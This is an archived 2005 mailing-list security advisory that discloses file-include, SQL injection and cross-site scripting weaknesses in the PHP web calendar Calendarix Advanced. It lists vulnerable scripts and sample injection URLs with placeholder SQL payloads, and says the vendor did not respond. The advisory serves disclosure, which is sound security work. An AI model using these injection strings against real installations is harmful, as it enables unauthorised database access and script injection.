Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

multiple vulnerability Calendarix Advanced

from [DarkBicho] Network Security [Permanent Link]
Subject: multiple vulnerability Calendarix Advanced
Date: Tue, 31 May 2005 12:22:16 -0500 
/***********************************************
* Advisorie : 01-0005-15
* title: multiple vulnerability
* Software: Calendarix Advanced 
* Date: 28. April 2005
* Web: http://www.calendarix.com/
************************************************/


- Affected software description:

Webcalendar is a web software write in php y mysql 

- Expoit:

        Include 

        line 16 
        admin/cal_admintop.php:include_once ($calpath."cal_utils.php");

        xss and sql injection

        line 122 - 160
        cal_day.php?op=day&date=2005-05-03&catview=1[sql]/*
        cal_pophols.php?id=999'[sql]/*  
        line 23
        calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1
        line 194 - 196
        cal_week.php?op=week&catview= 999'[sql]/*
        line 34 - 39
        cal_cat.php?op=cats&catview=999'[sql]*/


- How to fix:

        Vendor no responds

- Credits:

        DarkBicho
        Email: darkbicho@gmail.com
        Web: http://www.swp-scene.org


- Grettings:
        "A mi Team SWP"
        " Viva el Peru Carajo"

-- 
- - - - - - - - - - - - - - - - - - - - - - - - - 
Miguel Sumaran (DarkBicho)
webpage: http://www.darkbicho.tk/
Team :  http://www.swp-scene.org/
Made in Peru
- - - - - - - - - - - - - - - - - - - - - - - - -
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • multiple vulnerability Calendarix Advanced, DarkBicho <=
Previous by Date:  Re: [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3, Ow Mun Heng
Next by Date:  Re: [security@suse.de] [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3, Todd C. Miller
Previous by Thread:  Wide-scale industrial espionage using Trojan horses in Israel, Gadi Evron
Next by Thread:  [Full-disclosure] ISR :: Infobyte Security Research :: (ISR-form.pl), famato
Indexes:  [Date] [Thread] [Top] [All Lists]